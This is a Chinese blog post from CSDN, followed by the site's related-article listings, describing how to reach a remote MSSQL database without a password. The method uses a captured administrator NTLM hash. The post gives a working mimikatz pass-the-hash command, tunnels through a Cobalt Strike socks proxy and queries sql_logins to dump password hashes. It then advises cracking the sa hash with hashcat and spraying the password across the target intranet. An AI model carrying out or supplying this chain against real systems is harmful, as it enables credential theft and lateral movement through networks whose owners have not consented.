Mssql 高级利用技巧 无需密码直连远程 mssql

已于 2023-05-27 16:47:51 修改
阅读量250 收藏
点赞数
文章标签: 数据库
于 2023-05-27 16:45:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_31812157/article/details/130903130
版权

实战场景

当前只有目标内网指定 mssql 机器本地管理员的密码 hash ,想进入数据库拿下更多的账号密码,但是无奈手里还没有任何可用的数据库账号密码 那如何实现无密码远程登录 mssql 数据库呢

原理

因为 mssql 默认支持 windows 本地认证登录 ,一般情况下administrator是能直接用凭证登录而不需要数据库密码的,因此我们可以抓取管理员的hash,本地hash注入启动 sockscap ,之后用sockscap启动 ssms 或者 navicat,而由sockscap启动的进程也是继承了刚刚的管理员权限

实战

抓到hash

使用mimikatz将进程注入

mimikatz "privilege::debug" "sekurlsa::pth /user:kaeiy /domain:. /ntlm:32ed87bdb5fdc5e9cba88547376818d4 /run:\"C:\Users\11502\AppData\Local\SocksCap64\SocksCap64_RunAsAdmin.exe\"" "exit"

cs开启一个socks服务使用SocksCap连接,并且用他启动navicat

输入目标主机ip地址直接选择windows认证即可连接成功

查询mssql用户

select name,password_hash from master.sys.sql_logins;

大家可以看到navicat回显不友好

所以还是选择ssms.exe比较好

把查出来的sa丢到 hashcat 跑跑,然后再拿着跑出来的 sa 明文密码,批量去跑下内网所有的 mssql 机器, 运气好说不定又能快速扩到一批内网机器

关于本地 hash 注入可利用的方式其实还非常多,甚至可以稍微衍生一步想想,是不是所有基于 windows 认证登录的服务或者客户端连接工具,都可以进行类似的利用呢?

K0e1y
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
解决MSSQL2005远程连接sql2000非默认端口数据库的问题
09-14
MSSQL2005连接sql2000非默认端口数据库的问题给我折腾了快一天了,快疯了,连接TCP/IP默认1433端口没问题,连接其他端口数据库问题有了。
MSSQL内连接inner join查询方法
09-14
sql内连接查询代码,实例分析inner join实现方法
PHP基于mssql扩展远程连接MSSQL的简单实现方法
12-18
本文实例讲述了PHP基于mssql扩展远程连接MSSQL的简单实现方法。分享给大家供大家参考,具体如下: 这里给出的是一个简单的示例,没有做安全考虑,自行处理吧: <?php // 连接数据库 $conn = mssql_connect('hostip:1433','user','pass') or die("SQL SERVER 数据库连接失败!"); // 选择数据库 mssql_select_db('UserInfo', $conn); // sql语句 $sql = "SELECT TOP 5 * FROM info"; $result = mssql_query($sql); //
php连接MSSQL数据库的常用操作
12-14
数据库查询不外乎4个步骤,1、建立连接。2、输入查询代码。3、建立查询并取出数据。4、关闭连接。   php连接mssql数据库有几个注意事项,尤其mssql的多个版本、32位、64位都有区别。   首先,php.ini文件中;extension=php_pdo_mssql.dll ;extension=php_pdo_odbc.dll 前面的分号去掉,对应的使哪种方式连接mssql。注意要重启服务使其生效。   一、建立连接   1、odbc   首先,在php程序所在的服务器设置odbc。这里32位和64位操作系统有区别。32位的从控制面板中管理工具中的数据源(odbc)直接建立
为什么mysql设置了密码之后,本地还可以直接访问,不需要输入密码就可以登录数据库了?
reg183的专栏
11-02 393
今天开发中在Centos7中安装MySQL5.6版本后,已经设置密码了,即使密码正确也不能登录,最后发现,直接用“mysql -u -p”不输入密码也可以登陆。 后来,查询了资料原因是:应为数据库里面有空用户,通过 select * from mysql.user where user=''; 查询如果有,然后通过 use mysql; delete from user where user = ''; 删除了多余的空白账户, 然后,通过 flush privileges;­ 重载一次权限表,最后用 ser
Mysql之三种免密登录方式
月生的静心苑
12-30 9314
一、示例环境版本说明 操作系统版本centos7.6 [wuhs@test1 mysql]$ cat /etc/redhat-release CentOS Linux release 7.6.1810 (Core) mysql数据库版本5.7.32 [wuhs@test1 mysql]$ mysql -V mysql Ver 14.14 Distrib 5.7.32, for el7 (x86_64) using EditLine wrapper 二、MySQL免密登录方式配置示例 1、通过设置
密码连接mysql数据库
weixin_44923449的博客
03-24 1219
密码连接mysql数据库
MsSql 利用
MrMeizhi的博客
01-03 326
文章目录0x01 前言0x02 xp_cmdshell1、查询xp_cmdshell状态2、启用xp_cmdshell3、执行命令4、删除与恢复(未做实验,需谨慎使用)0x03 COM组件1、查看SP_OACREATE状态2、开启SP_OACREATE3、执行命令0x04 CLR(没有复现成功)1、开启CLR功能2、导入程序集3、创建存储过程4、执行命令0x05 Log备份getshell1、前提条件(可略过)2、利用0x06 其他(待补充)0x07 参考 0x01 前言 网络上很多文章已经总结过相关的利用
mysql mssql 数据同步_mssql数据同步实现数据复制的步骤
weixin_31845811的博客
01-19 287
mssql数据同步实现数据复制的步骤更新时间:2008年09月21日 22:24:19 作者:需要用到mssql数据同步的朋友可以参考本文和上一篇文章一 配置发布服务器在发布服务器上执行以下步骤:(1) 从[工具]下拉菜单的[复制]子菜单中选择[配置发布、订阅服务器和分发]出现配置发布和分发向导(2) [下一步] 选择分发服务器 可以选择把发布服务器自己作为分发服务器或者其他sql的服务器(3...
android studio连接sqls,AndroidStudio版直连sqlserver.rar
weixin_36060412的博客
05-30 524
testSQLServer\.gitignore98 BytestestSQLServer\.gradle\2.4\taskArtifacts\cache.properties31 BytestestSQLServer\.gradle\2.4\taskArtifacts\cache.properties.lock17 BytestestSQLServer\.gradle\2.4\taskArtif...
每日一记:通过sqlplus不暴露密码连接数据库
点滴的幸福
04-18 1787
相信,很多DBA朋友平时都习惯了sqlplus /nolog或sqlplus / as sysdba或sqlplus system/******等方式登陆db,这些方式很容易暴露db的口令密码,要是连接本机的db环境还好,sqlplus /nolog进入sqlplus后用“conn用户名”可以隐藏口令密码登陆,如果是登陆远程机器,要怎么写连接信息呢? 相信很多人是说,直接写用户名不写密码,等s...
【Oracle】PL/SQL Developer登录Oracle数据库,设置免密登录模式
weixin_43416960的博客
01-09 3035
本文将介绍如何使用PL/SQL Developer连接一个新的Oracle数据库,以及登录Oracle数据库时,怎样设置为免密登录模式。
Spring-Cloud 微服务
weixin_65127444的博客
05-15 900
先来思考一个问题*通过上一章的操作,我们已经可以实现微服务之间的调用。但是我们把服务提供者的网络地址(ip,端口)等硬编码到了代码中,这种做法存在许多问题:1.一旦服务提供者地址变化,就需要手工修改代码2. 一旦是多个服务提供者,无法实现负载均衡功能3.一旦服务变得越来越多,人工维护调用关系困难那么应该怎么解决呢,这时候就需要通过注册中心动态的实现。
生产报表工具PI DataLInk 与 行列视之间的区别
2401_83701843的博客
05-17 252
行列视,全名“行列视生产数据应用系统”,行列视品牌所面对的业务范围远远超越了PIDatalink报表工具,他首先是一款本地部署的在线Excel文档管理系统,解决个人报表在线管理问题,其次,她和PIDataLInk一样,也是面向实时数据库报表需求的一套工具,其区别在于行列视品牌兼容国内外大多数实时数据库,也可以同时连接多个数据源,也就是她完全可以替代PI-DataLINk,同时也适用于其他品牌下的实时数据库系统;
MySQL存储过程添加二十万条数据日常练习
mi_mx的博客
05-17 306
【代码】MySQL日常练习。
linux中查找某个文件或文件夹
DN金猿的博客
05-18 251
locate命令将会在整个系统中搜索文件和文件夹,并通过正则表达式匹配以"/folder_name"结尾的路径。这将会在指定的路径(/path/to/search)中递归地列出所有文件和文件夹,并使用grep命令匹配以"/folder_name"结尾的行。该命令将会在指定的路径(/path/to/search)中查找名称为"folder_name"的文件夹。此方法与第2种方法类似,但使用了find命令来递归搜索文件夹,并使用grep命令来匹配以"/folder_name"结尾的行。
MaxKB,基于 LLM 大语言模型的知识库问答系统,开箱即用,支持快速嵌入到第三方业务系统。
最新发布
AIGC Studio:分享AIGC前沿知识和好玩应用,公众号同名。
05-21 77
MaxKB 是一款基于 LLM 大语言模型的知识库问答系统。MaxKB = Max Knowledge Base,旨在成为企业的最强大脑。开箱即用:支持直接上传文档、自动爬取在线文档,支持文本自动拆分、向量化、RAG(检索增强生成),智能问答交互体验好;无缝嵌入:支持零编码快速嵌入到第三方业务系统;
sqlmap直连MSSQL数据库
02-22
要使用SQLMap直连MSSQL数据库,首先需要确保已经安装了Python和SQLMap。然后,按照以下步骤进行操作: 1. 打开命令行终端,并导航到SQLMap的安装目录。 2. 输入以下命令来检测目标网站是否存在SQL注入漏洞: ``` ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值